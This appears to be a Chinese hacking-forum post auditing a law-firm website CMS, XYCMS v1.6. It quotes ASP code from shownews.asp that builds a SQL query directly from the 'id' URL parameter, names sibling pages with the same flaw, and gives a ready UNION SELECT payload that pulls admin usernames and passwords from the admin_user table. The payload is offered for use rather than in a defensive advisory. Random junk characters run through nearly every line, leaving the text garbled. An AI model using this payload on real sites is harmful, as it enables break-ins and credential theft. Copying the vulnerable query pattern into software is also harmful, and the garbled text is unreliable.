前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似8 r" n1 d% A: Q9 Y/ M/ E
0 D# ~8 Q. t2 x淫荡分割线
! x: x# X# A2 r; B9 _--------------------------------------------------------
4 a4 Z0 q$ N' p9 u; o 8 f- d4 p/ C6 D& U1 `4 b; ~
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)( k# ?$ z- k; V! i
源码地址:http://down.chinaz.com/soft/29233.htm
8 m$ q# z1 [* t# @/ H
2 w" X7 B4 @8 H1 F8 {- \漏洞文件:shownews.asp; J4 O# Y8 v: o. U e& j2 Y, E) f
漏洞代码:7-13行; |% v2 K L7 m/ c) U
- _2 y5 S, M7 j2 [
) v" l8 N: t/ g& N<% T2 ~7 w! s0 _
id=request.QueryString("id")$ V Z) k( E6 f+ v' p7 _, S
$ p1 g& [3 z/ V N* c% Vset snews=server.createobject("adodb.recordset")
4 A. P% X/ u, b; w6 U4 oexec="select * from [news] where id="&id
4 e, D% R9 V" d8 V5 I0 csnews.open exec,conn,1,1
& g G5 L! O5 ]! t%>+ s5 H! g+ `) d/ A
, H8 r( v2 k3 n- [# U. Z: X 5 s. e$ V* D$ t) O/ V( _# w
什么过滤都没有 直造成注入
! t: q. P, |4 X/ \1 ^ 8 @7 |- g* Y N
注入点:http://127.0.0.1:99/shownews.asp?id=xx
+ ?# C* g6 u7 j @% @7 o$ o. g v2 T2 o0 R
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找! b7 F2 g, l( M4 |# B4 @: R6 I
6 \) \' p1 N$ k* O
0 ~ r' x6 \9 Z7 w) |
exp: union select 1,admin,password,4,5,7 from admin_user) j6 B% b! y4 a. f- d4 k% A
, a9 Z7 B" Z* ~( c) ? |